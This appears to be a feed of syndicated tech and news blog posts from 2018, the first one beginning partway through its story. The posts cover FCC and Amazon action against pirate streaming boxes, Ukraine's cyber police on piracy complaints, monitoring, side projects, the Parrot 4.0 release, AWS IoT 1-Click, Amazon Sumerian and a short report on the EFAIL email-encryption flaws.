Although the problem persists on both platforms, people are now much less likely to find infringing devices than they were 12 to 24 months ago. Under pressure from entertainment industry groups, both Amazon and eBay have tightened the screws on sellers of such devices. Now, however, both companies have received requests to stem sales from a completetey different direction.

In a letter to eBay CEO Devin Wenig and Amazon CEO Jeff Bezos first spotted by Ars, FCC Commissioner Michael O’Rielly calls on the platforms to take action against piracy-configured boxes that fail to comply with FCC equipment authorization requirements or falsely display FCC logos, contrary to United States law.

“Disturbingly, some rogue set-top box manufacturers and distributors are exploiting the FCC’s trusted logo by fraudulently placing it on devices that have not been approved via the Commission’s equipment authorization process,” O’Rielly’s letter reads.

“Specifically, nine set-top box distributors were referred to the FCC in October for enabling the unlawful streaming of copyrighted material, seven of which displayed the FCC logo, although there was no record of such compliance.”

While O’Rielly admits that the copyright infringement aspects fall outside the jurisdiction of the FCC, he says it’s troubling that many of these devices are used to stream infringing content, “exacerbating the theft of billions of dollars in American innovation and creativity.”

As noted above, both Amazon and eBay have taken steps to reduce sales of pirate boxes on their respective platforms on copyright infringement grounds, something which is duly noted by O’Rielly. However, he points out that devices continue to be sold to members of the public who may believe that the devices are legal since they’re available for sale from legitimate companies.

“For these reasons, I am seeking your further cooperation in assisting the FCC in taking steps to eliminate the non-FCC compliant devices or devices that fraudulently bear the FCC logo,” the Commissioner writes (pdf).

“Moreover, if your company is made aware by the Commission, with supporting evidence, that a particular device is using a fraudulent FCC label or has not been appropriately certified and labeled with a valid FCC logo, I respectfully request that you commit to swiftly removing these products from your sites.”

In the event that Amazon and eBay take action under this request, O’Rielly asks both platforms to hand over information they hold on offending manufacturers, distributors, and suppliers.

Amazon was quick to respond to the FCC. In a letter published by Ars, Amazon’s Public Policy Vice President Brian Huseman assured O’Rielly that the company is not only dedicated to tackling rogue devices on copyright-infringement grounds but also when there is fraudulent use of the FCC’s logos.

Noting that Amazon is a key member of the Alliance for Creativity and Entertainment (ACE) – a group that has been taking legal action against sellers of infringing streaming devices (ISDs) and those who make infringing addons for Kodi-type systems – Huseman says that dealing with the problem is a top priority.

“Our goal is to prevent the sale of ISDs anywhere, as we seek to protect our customers from the risks posed by these devices, in addition to our interest in protecting Amazon Studios content,” Huseman writes.

“In 2017, Amazon became the first online marketplace to prohibit the sale of streaming media players that promote or facilitate piracy. To prevent the sale of these devices, we proactively scan product listings for signs of potentially infringing products, and we also invest heavily in sophisticated, automated real-time tools to review a variety of data sources and signals to identify inauthentic goods.

“These automated tools are supplemented by human reviewers that conduct manual investigations. When we suspect infringement, we take immediate action to remove suspected listings, and we also take enforcement action against sellers’ entire accounts when appropriate.”

Huseman also reveals that since implementing a proactive policy against such devices, “tens of thousands” of listings have been blocked from Amazon. In addition, the platform has been making criminal referrals to law enforcement as well as taking civil action (1,2,3) as part of ACE.

“As noted in your letter, we would also appreciate the opportunity to collaborate further with the FCC to remove non-compliant devices that improperly use the FCC logo or falsely claim FCC certification. If any FCC non-compliant devices are identified, we seek to work with you to ensure they are not offered for sale,” Huseman concludes.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Monitoring for Everyone

Post Syndicated from Blogs on Grafana Labs Blog original https://grafana.com/blog/2018/05/23/monitoring-for-everyone/

Øredev – Carl Bergquist – Monitoring for Everyone What is monitoring?
What do the terms log, metric, and distributed tracing actually mean?
What makes a good alert?
Why should I care?
At a recent developer conference in Malmö, Sweden, I gave a presentation on monitoring and observability to discuss the high level concepts and common tools that are out there.
Monitoring and observability can easily become quite complex, but at the heart of it, we simply want to know how our systems are performing, and when performance drops – be able to find out why.

The Benefits of Side Projects

Post Syndicated from Bozho original https://techblog.bozho.net/the-benefits-of-side-projects/

Side projects are the things you do at home, after work, for your own “entertainment”, or to satisfy your desire to learn new stuff, in case your workplace doesn’t give you that opportunity (or at least not enough of it). Side projects are also a way to build stuff that you think is valuable but not necessarily “commercialisable”. Many side projects are open-sourced sooner or later and some of them contribute to the pool of tools at other people’s disposal.

I’ve outlined one recommendation about side projects before – do them with technologies that are new to you, so that you learn important things that will keep you better positioned in the software world.

But there are more benefits than that – serendipitous benefits, for example. And I’d like to tell some personal stories about that. I’ll focus on a few examples from my list of side projects to show how, through a sort-of butterfly effect, they helped shape my career.

The computoser project, no matter how cool algorithmic music composition, didn’t manage to have much of a long term impact. But it did teach me something apart from niche musical theory – how to read a bulk of scientific papers (mostly computer science) and understand them without being formally trained in the particular field. We’ll see how that was useful later.

Then there was the “State alerts” project – a website that scraped content from public institutions in my country (legislation, legislation proposals, decisions by regulators, new tenders, etc.), made them searchable, and “subscribable” – so that you get notified when a keyword of interest is mentioned in newly proposed legislation, for example. (I obviously subscribed for “information technologies” and “electronic”).

And that project turned out to have a significant impact on the following years. First, I chose a new technology to write it with – Scala. Which turned out to be of great use when I started working at TomTom, and on the 3rd day I was transferred to a Scala project, which was way cooler and much more complex than the original one I was hired for. It was a bit ironic, as my colleagues had just read that “I don’t like Scala” a few weeks earlier, but nevertheless, that was one of the most interesting projects I’ve worked on, and it went on for two years. Had I not known Scala, I’d probably be gone from TomTom much earlier (as the other project was restructured a few times), and I would not have learned many of the scalability, architecture and AWS lessons that I did learn there.

But the very same project had an even more important follow-up. Because if its “civic hacking” flavour, I was invited to join an informal group of developers (later officiated as an NGO) who create tools that are useful for society (something like MySociety.org). That group gathered regularly, discussed both tools and policies, and at some point we put up a list of policy priorities that we wanted to lobby policy makers. One of them was open source for the government, the other one was open data. As a result of our interaction with an interim government, we donated the official open data portal of my country, functioning to this day.

As a result of that, a few months later we got a proposal from the deputy prime minister’s office to “elect” one of the group for an advisor to the cabinet. And we decided that could be me. So I went for it and became advisor to the deputy prime minister. The job has nothing to do with anything one could imagine, and it was challenging and fascinating. We managed to pass legislation, including one that requires open source for custom projects, eID and open data. And all of that would not have been possible without my little side project.

As for my latest side project, LogSentinel – it became my current startup company. And not without help from the previous two mentioned above – the computer science paper reading was of great use when I was navigating the crypto papers landscape, and from the government job I not only gained invaluable legal knowledge, but I also “got” a co-founder.

Some other side projects died without much fanfare, and that’s fine. But the ones above shaped my “story” in a way that would not have been possible otherwise.

And I agree that such serendipitous chain of events could have happened without side projects – I could’ve gotten these opportunities by meeting someone at a bar (unlikely, but who knows). But we, as software engineers, are capable of tilting chance towards us by utilizing our skills. Side projects are our “extracurricular activities”, and they often lead to unpredictable, but rather positive chains of events. They would rarely be the only factor, but they are certainly great at unlocking potential.

The post The Benefits of Side Projects appeared first on Bozho's tech blog.

Despite US Criticism, Ukraine Cybercrime Chief Receives Few Piracy Complaints

Post Syndicated from Andy original https://torrentfreak.com/despite-us-criticism-ukraine-cybercrime-chief-receives-few-piracy-complaints-180522/

On a large number of occasions over the past decade, Ukraine has played host to some of the world’s largest pirate sites.

At various points over the years, The Pirate Bay, KickassTorrents, ExtraTorrent, Demonoid and raft of streaming portals could be found housed in the country’s data centers, reportedly taking advantage of laws more favorable than those in the US and EU.

As a result, Ukraine has been regularly criticized for not doing enough to combat piracy but when placed under pressure, it does take action. In 2010, for example, the local government expressed concerns about the hosting of KickassTorrents in the country and in August the same year, the site was kicked out by its host.

“Kickasstorrents.com main web server was shut down by the hosting provider after it was contacted by local authorities. One way or another I’m afraid we must say goodbye to Ukraine and move the servers to other countries,” the site’s founder told TF at the time.

In the years since, Ukraine has launched sporadic action against pirate sites and has taken steps to tighten up copyright law. The Law on State Support of Cinematography came into force during April 2017 and gave copyright owners new tools to combat infringement by forcing (in theory, at least) site operators and web hosts to respond to takedown requests.

But according to the United States and Europe, not enough is being done. After the EU Commission warned that Ukraine risked damaging relations with the EU, last September US companies followed up with another scathing attack.

In a recommendation to the U.S. Government, the IIPA, which counts the MPAA, RIAA, and ESA among its members, asked U.S. authorities to suspend or withdraw Ukraine’s trade benefits until the online piracy situation improves.

“Legislation is needed to institute proper notice and takedown provisions, including a requirement that service providers terminate access to individuals (or entities) that have repeatedly engaged in infringement, and the retention of information for law enforcement, as well as to provide clear third party liability regarding ISPs,” the IIPA wrote.

But amid all the criticism, Ukraine cyber police chief Sergey Demedyuk says that while his department is committed to tackling piracy, it can only do so when complaints are filed with him.

“Yes, we are engaged in piracy very closely. The problem is that piracy is a crime of private accusation. So here we deal with them only in cases where we are contacted,” Demedyuk said in an Interfax interview published yesterday.

Surprisingly, given the number of dissenting voices, it appears that complaints about these matters aren’t exactly prevalent. So are there many at all?

“Unfortunately, no. In the media, many companies claim that their rights are being violated by pirates. But if you count the applications that come to us, they are one,” Demedyuk reveals.

“In general, we are handling Ukrainian media companies, who produce their own product and are worried about its fate. Also on foreign films, the ‘Anti-Piracy Agency’ refers to us, but not as intensively as before.”

Why complaints are going down, Demedyuk does not know, but when his unit is asked to take action it does so, he claims. Indeed, Demedyuk cites two particularly significant historical operations against a pair of large ‘pirate’ sites.

In 2012, Ukraine shut down EX.ua, a massive cyberlocker site following a six-month investigation initiated by international tech companies including Microsoft, Graphisoft and Adobe. Around 200 servers were seized, together hosting around 6,000 terabytes of data.

Then in November 2016, following a complaint from the MPAA, police raided FS.to, one of Ukraine’s most popular pirate sites. Initial reports indicated that 60 servers were seized and 19 people were arrested.

“To see the effect of combating piracy, this should not be done at the level of cyberpolicy, but at the state level,” Demedyuk advises.

“This requires constant close interaction between law enforcement agencies and rights holders. Only by using all these tools will we be able to effectively counteract copyright infringements.”

Meanwhile, the Office of the United States Trade Representative has maintained Ukraine’s position on the Priority Watchlist of its latest Special 301 Report and there a no signs it will be leaving anytime soon.

Source: TF, for the latest info on copyright, file-sharing, torrent sites and more. We also have VPN reviews, discounts, offers and coupons.

Parrot 4.0 is out

Post Syndicated from ris original https://lwn.net/Articles/755095/rss

Parrot 4.0 has been released. Parrot
is a security-oriented distribution aimed at penetration tests and digital
forensics analysis, with additional tools to preserve privacy. “On
Parrot 4.0 we decided to provide netinstall images too as we would like
people to use Parrot not only as a pentest distribution, but also as a
framework to build their very own working environment with ease.

Docker templates are also available.

AWS IoT 1-Click – Use Simple Devices to Trigger Lambda Functions

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/aws-iot-1-click-use-simple-devices-to-trigger-lambda-functions/

We announced a preview of AWS IoT 1-Click at AWS re:Invent 2017 and have been refining it ever since, focusing on simplicity and a clean out-of-box experience. Designed to make IoT available and accessible to a broad audience, AWS IoT 1-Click is now generally available, along with new IoT buttons from AWS and AT&T.

I sat down with the dev team a month or two ago to learn about the service so that I could start thinking about my blog post. During the meeting they gave me a pair of IoT buttons and I started to think about some creative ways to put them to use. Here are a few that I came up with:

Help Request – Earlier this month I spent a very pleasant weekend at the HackTillDawn hackathon in Los Angeles. As the participants were hacking away, they occasionally had questions about AWS, machine learning, Amazon SageMaker, and AWS DeepLens. While we had plenty of AWS Solution Architects on hand (decked out in fashionable & distinctive AWS shirts for easy identification), I imagined an IoT button for each team. Pressing the button would alert the SA crew via SMS and direct them to the proper table.

Camera ControlTim Bray and I were in the AWS video studio, prepping for the first episode of Tim’s series on AWS Messaging. Minutes before we opened the Twitch stream I realized that we did not have a clean, unobtrusive way to ask the camera operator to switch to a closeup view. Again, I imagined that a couple of IoT buttons would allow us to make the request.

Remote Dog Treat Dispenser – My dog barks every time a stranger opens the gate in front of our house. While it is great to have confirmation that my Ring doorbell is working, I would like to be able to press a button and dispense a treat so that Luna stops barking!

Homes, offices, factories, schools, vehicles, and health care facilities can all benefit from IoT buttons and other simple IoT devices, all managed using AWS IoT 1-Click.

All About AWS IoT 1-Click
As I said earlier, we have been focusing on simplicity and a clean out-of-box experience. Here’s what that means:

Architects can dream up applications for inexpensive, low-powered devices.

Developers don’t need to write any device-level code. They can make use of pre-built actions, which send email or SMS messages, or write their own custom actions using AWS Lambda functions.

Installers don’t have to install certificates or configure cloud endpoints on newly acquired devices, and don’t have to worry about firmware updates.

Administrators can monitor the overall status and health of each device, and can arrange to receive alerts when a device nears the end of its useful life and needs to be replaced, using a single interface that spans device types and manufacturers.

I’ll show you how easy this is in just a moment. But first, let’s talk about the current set of devices that are supported by AWS IoT 1-Click.

Who’s Got the Button?
We’re launching with support for two types of buttons (both pictured above). Both types of buttons are pre-configured with X.509 certificates, communicate to the cloud over secure connections, and are ready to use.

The AWS IoT Enterprise Button communicates via Wi-Fi. It has a 2000-click lifetime, encrypts outbound data using TLS, and can be configured using BLE and our mobile app. It retails for $19.99 (shipping and handling not included) and can be used in the United States, Europe, and Japan.

The AT&T LTE-M Button communicates via the LTE-M cellular network. It has a 1500-click lifetime, and also encrypts outbound data using TLS. The device and the bundled data plan is available an an introductory price of $29.99 (shipping and handling not included), and can be used in the United States.

We are very interested in working with device manufacturers in order to make even more shapes, sizes, and types of devices (badge readers, asset trackers, motion detectors, and industrial sensors, to name a few) available to our customers. Our team will be happy to tell you about our provisioning tools and our facility for pushing OTA (over the air) updates to large fleets of devices; you can contact them at [email protected].

AWS IoT 1-Click Concepts
I’m eager to show you how to use AWS IoT 1-Click and the buttons, but need to introduce a few concepts first.

Device – A button or other item that can send messages. Each device is uniquely identified by a serial number.

Placement Template – Describes a like-minded collection of devices to be deployed. Specifies the action to be performed and lists the names of custom attributes for each device.

Placement – A device that has been deployed. Referring to placements instead of devices gives you the freedom to replace and upgrade devices with minimal disruption. Each placement can include values for custom attributes such as a location (“Building 8, 3rd Floor, Room 1337”) or a purpose (“Coffee Request Button”).

Action – The AWS Lambda function to invoke when the button is pressed. You can write a function from scratch, or you can make use of a pair of predefined functions that send an email or an SMS message. The actions have access to the attributes; you can, for example, send an SMS message with the text “Urgent need for coffee in Building 8, 3rd Floor, Room 1337.”

Getting Started with AWS IoT 1-Click
Let’s set up an IoT button using the AWS IoT 1-Click Console:

If I didn’t have any buttons I could click Buy devices to get some. But, I do have some, so I click Claim devices to move ahead. I enter the device ID or claim code for my AT&T button and click Claim (I can enter multiple claim codes or device IDs if I want):

The AWS buttons can be claimed using the console or the mobile app; the first step is to use the mobile app to configure the button to use my Wi-Fi:

Then I scan the barcode on the box and click the button to complete the process of claiming the device. Both of my buttons are now visible in the console:

I am now ready to put them to use. I click on Projects, and then Create a project:

I name and describe my project, and click Next to proceed:

Now I define a device template, along with names and default values for the placement attributes. Here’s how I set up a device template (projects can contain several, but I just need one):

The action has two mandatory parameters (phone number and SMS message) built in; I add three more (Building, Room, and Floor) and click Create project:

I’m almost ready to ask for some coffee! The next step is to associate my buttons with this project by creating a placement for each one. I click Create placements to proceed. I name each placement, select the device to associate with it, and then enter values for the attributes that I established for the project. I can also add additional attributes that are peculiar to this placement:

I can inspect my project and see that everything looks good:

I click on the buttons and the SMS messages appear:

I can monitor device activity in the AWS IoT 1-Click Console:

And also in the Lambda Console:

The Lambda function itself is also accessible, and can be used as-is or customized:

As you can see, this is the code that lets me use {{*}}include all of the placement attributes in the message and {{Building}} (for example) to include a specific placement attribute.

Now Available
I’ve barely scratched the surface of this cool new service and I encourage you to give it a try (or a click) yourself. Buy a button or two, build something cool, and let me know all about it!

Pricing is based on the number of enabled devices in your account, measured monthly and pro-rated for partial months. Devices can be enabled or disabled at any time. See the AWS IoT 1-Click Pricing page for more info.

To learn more, visit the AWS IoT 1-Click home page or read the AWS IoT 1-Click documentation.

Jeff;

 

Amazon Sumerian – Now Generally Available

Post Syndicated from Jeff Barr original https://aws.amazon.com/blogs/aws/amazon-sumerian-now-generally-available/

We announced Amazon Sumerian at AWS re:Invent 2017. As you can see from Tara‘s blog post (Presenting Amazon Sumerian: An Easy Way to Create VR, AR, and 3D Experiences), Sumerian does not require any specialized programming or 3D graphics expertise. You can build VR, AR, and 3D experiences for a wide variety of popular hardware platforms including mobile devices, head-mounted displays, digital signs, and web browsers.

I’m happy to announce that Sumerian is now generally available. You can create realistic virtual environments and scenes without having to acquire or master specialized tools for 3D modeling, animation, lighting, audio editing, or programming. Once built, you can deploy your finished creation across multiple platforms without having to write custom code or deal with specialized deployment systems and processes.

Sumerian gives you a web-based editor that you can use to quickly and easily create realistic, professional-quality scenes. There’s a visual scripting tool that lets you build logic to control how objects and characters (Sumerian Hosts) respond to user actions. Sumerian also lets you create rich, natural interactions powered by AWS services such as Amazon Lex, Polly, AWS Lambda, AWS IoT, and Amazon DynamoDB.

Sumerian was designed to work on multiple platforms. The VR and AR apps that you create in Sumerian will run in browsers that supports WebGL or WebVR and on popular devices such as the Oculus Rift, HTC Vive, and those powered by iOS or Android.

During the preview period, we have been working with a broad spectrum of customers to put Sumerian to the test and to create proof of concept (PoC) projects designed to highlight an equally broad spectrum of use cases, including employee education, training simulations, field service productivity, virtual concierge, design and creative, and brand engagement. Fidelity Labs (the internal R&D unit of Fidelity Investments), was the first to use a Sumerian host to create an engaging VR experience. Cora (the host) lives within a virtual chart room. She can display stock quotes, pull up company charts, and answer questions about a company’s performance. This PoC uses Amazon Polly to implement text to speech and Amazon Lex for conversational chatbot functionality. Read their blog post and watch the video inside to see Cora in action:

Now that Sumerian is generally available, you have the power to create engaging AR, VR, and 3D experiences of your own. To learn more, visit the Amazon Sumerian home page and then spend some quality time with our extensive collection of Sumerian Tutorials.

Jeff;

 

Serious vulnerabilities with OpenPGP and S/MIME

Post Syndicated from corbet original https://lwn.net/Articles/754370/rss

The efail.de site describes a set of
vulnerabilities in the implementation of PGP and MIME that can cause the
disclosure of encrypted communications, including old messages. “In a
nutshell, EFAIL abuses active content of HTML emails, for example
externally loaded images or styles, to exfiltrate plaintext through
requested URLs.

The EFF recommends
uninstalling email-encryption tools that automatically
decrypt email entirely. “Until the flaws
described in the paper are more widely understood and fixed, users should
arrange for the use of alternative end-to-end secure channels, such as
Signal, and temporarily stop sending and especially reading PGP-encrypted
email.